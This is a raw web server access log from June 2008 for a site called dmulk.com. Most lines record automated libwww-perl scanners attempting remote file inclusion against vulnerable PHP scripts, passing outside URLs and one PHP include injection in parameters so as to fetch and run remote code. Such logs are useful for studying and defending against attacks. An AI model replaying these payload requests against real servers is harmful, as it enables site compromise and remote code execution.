209.172.57.250 - - [17/Jun/2008:10:54:32 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:10:54:32 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:10:54:40 -0700] "GET /logs/access_080226.log//components/com_simpleboard/image_upload.php?sbp=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:10:54:40 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:10:54:41 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:10:54:49 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:10:54:50 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:10:54:50 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:10:54:53 -0700] "GET /logs/access_080226.log//components/com_simpleboard/image_upload.php?sbp=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:10:54:54 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:10:54:54 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:10:55:03 -0700] "GET /logs/access_080126.log//components/com_simpleboard/image_upload.php?sbp=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:10:55:19 -0700] "GET /logs/access_080126.log//components/com_simpleboard/image_upload.php?sbp=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:10:55:26 -0700] "GET /logs/access_080226.log//components/com_simpleboard/image_upload.php?sbp=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:10:55:27 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:10:55:27 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:10:55:28 -0700] "GET /logs/access_080126.log//components/com_simpleboard/image_upload.php?sbp=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.249.73.161 - - [17/Jun/2008:10:55:45 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.161 - - [17/Jun/2008:10:55:51 -0700] "GET /?show=slide&pageid=17 HTTP/1.1" 200 34747 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
213.195.72.156 - - [17/Jun/2008:10:55:56 -0700] "GET /errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.76.116.20 - - [17/Jun/2008:10:56:00 -0700] "GET /logs/access_080429.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://thefantasyclub.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:10:56:09 -0700] "GET /logs/access_080118.log//components/com_simpleboard/image_upload.php?sbp=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:10:56:10 -0700] "GET /logs/access_080126.log//components/com_simpleboard/image_upload.php?sbp=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:10:56:24 -0700] "GET /logs/access_080118.log//components/com_simpleboard/image_upload.php?sbp=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:10:57:37 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:10:57:37 -0700] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:10:57:38 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:10:57:40 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:10:57:43 -0700] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:10:57:43 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.74.158.86 - - [17/Jun/2008:10:57:47 -0700] "GET /logs/access_080429.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://bucetinha.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [17/Jun/2008:10:58:08 -0700] "GET /logs/access_080221.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.74.194 - - [17/Jun/2008:10:59:31 -0700] "GET /logs/tools/verify_order_code[0].php?server_inc=http://bikebitsuk.com/temp/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.74.194 - - [17/Jun/2008:10:59:31 -0700] "GET /tools/verify_order_code[0].php?server_inc=http://bikebitsuk.com/temp/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
79.171.18.36 - - [17/Jun/2008:11:00:12 -0700] "GET /logs/access_080221.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.198.234.6 - - [17/Jun/2008:11:00:14 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.198.234.6 - - [17/Jun/2008:11:00:14 -0700] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.198.234.6 - - [17/Jun/2008:11:00:15 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.225.221.84 - - [17/Jun/2008:11:00:33 -0700] "GET /logs/access_080123.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://bucetinha.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.225.221.84 - - [17/Jun/2008:11:00:37 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://bucetinha.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.225.221.84 - - [17/Jun/2008:11:00:42 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://bucetinha.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.171.18.36 - - [17/Jun/2008:11:00:50 -0700] "GET /errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:01:05 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:01:05 -0700] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:01:06 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:01:06 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:01:09 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:01:09 -0700] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:01:10 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:01:12 -0700] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:01:13 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.7.206.59 - - [17/Jun/2008:11:01:16 -0700] "GET /logs/errors.php?error=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.206.59 - - [17/Jun/2008:11:01:19 -0700] "GET /errors.php?error=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.230.2.238 - - [17/Jun/2008:11:01:26 -0700] "GET /logs/main.php?x=http://www.ducklus.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.230.2.238 - - [17/Jun/2008:11:01:26 -0700] "GET /main.php?x=http://www.ducklus.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:11:01:41 -0700] "GET /logs/access_080308.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
209.172.57.250 - - [17/Jun/2008:11:01:41 -0700] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
209.172.57.250 - - [17/Jun/2008:11:01:41 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:01:54 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:01:55 -0700] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:01:55 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:11:02:24 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:11:02:24 -0700] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:11:02:24 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:11:02:59 -0700] "GET /logs/access_080308.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
209.172.57.250 - - [17/Jun/2008:11:02:59 -0700] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
209.51.219.170 - - [17/Jun/2008:11:02:59 -0700] "GET /logs/access_080201.log/errors.php?error=http://schirrwagen.info/license.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:11:03:00 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
209.51.219.170 - - [17/Jun/2008:11:03:00 -0700] "GET /errors.php?error=http://schirrwagen.info/license.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.51.219.170 - - [17/Jun/2008:11:03:00 -0700] "GET /logs/errors.php?error=http://schirrwagen.info/license.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.18.76 - - [17/Jun/2008:11:03:10 -0700] "GET /logs/index.php?redir=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.18.76 - - [17/Jun/2008:11:03:22 -0700] "GET /index.php?redir=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 200 18409 "-" "libwww-perl/5.805" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:11:03:38 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:11:03:38 -0700] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:11:03:38 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.20.173 - - [17/Jun/2008:11:04:35 -0700] "GET /config.php?path_to_root=http://www.immo-marrakech.com/files/contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
80.67.20.173 - - [17/Jun/2008:11:04:35 -0700] "GET /logs/config.php?path_to_root=http://www.immo-marrakech.com/files/contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
200.225.221.84 - - [17/Jun/2008:11:04:47 -0700] "GET /logs/access_080124.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://bucetinha.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.200.255.107 - - [17/Jun/2008:11:05:06 -0700] "GET /logs/access_080106.log//errors.php?error=http://220.130.55.207/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.200.255.107 - - [17/Jun/2008:11:05:06 -0700] "GET //errors.php?error=http://220.130.55.207/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.200.255.107 - - [17/Jun/2008:11:05:06 -0700] "GET /logs//errors.php?error=http://220.130.55.207/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:05:11 -0700] "GET /logs/access_080118.log//components/com_simpleboard/image_upload.php?sbp=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:05:11 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:05:11 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:05:14 -0700] "GET /logs/access_080118.log//components/com_simpleboard/image_upload.php?sbp=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:05:14 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:05:14 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:05:51 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:05:51 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:05:52 -0700] "GET /logs/access_080308.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:05:52 -0700] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:05:52 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:05:53 -0700] "GET /logs/access_080308.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:05:53 -0700] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:05:54 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
204.11.245.203 - - [17/Jun/2008:11:06:01 -0700] "GET /logs/access_080106.log//errors.php?error=http://220.130.55.207/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.11.245.203 - - [17/Jun/2008:11:06:01 -0700] "GET //errors.php?error=http://220.130.55.207/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.11.245.203 - - [17/Jun/2008:11:06:01 -0700] "GET /logs//errors.php?error=http://220.130.55.207/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.195.58.164 - - [17/Jun/2008:11:06:39 -0700] "GET /logs/access_080117.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.106.101.24 - - [17/Jun/2008:11:06:58 -0700] "GET /logs//administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [17/Jun/2008:11:06:59 -0700] "GET //administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.20.46.121 - - [17/Jun/2008:11:07:09 -0700] "GET /logs/access_080215.log/admin.php?include_path=http://www.lynnlott.com/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:07:10 -0700] "GET /logs/access_080118.log//components/com_simpleboard/image_upload.php?sbp=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:07:10 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:07:10 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:07:14 -0700] "GET /logs/access_080118.log//components/com_simpleboard/image_upload.php?sbp=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:07:15 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:07:15 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.198.234.6 - - [17/Jun/2008:11:07:15 -0700] "GET /logs/access_080118.log//components/com_simpleboard/image_upload.php?sbp=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.198.234.6 - - [17/Jun/2008:11:07:16 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.198.234.6 - - [17/Jun/2008:11:07:16 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:07:19 -0700] "GET /logs/access_080121.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:07:20 -0700] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:07:24 -0700] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:07:34 -0700] "GET /logs/access_080308.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:07:35 -0700] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:07:35 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:07:35 -0700] "GET /logs/access_080308.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:07:35 -0700] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:07:36 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
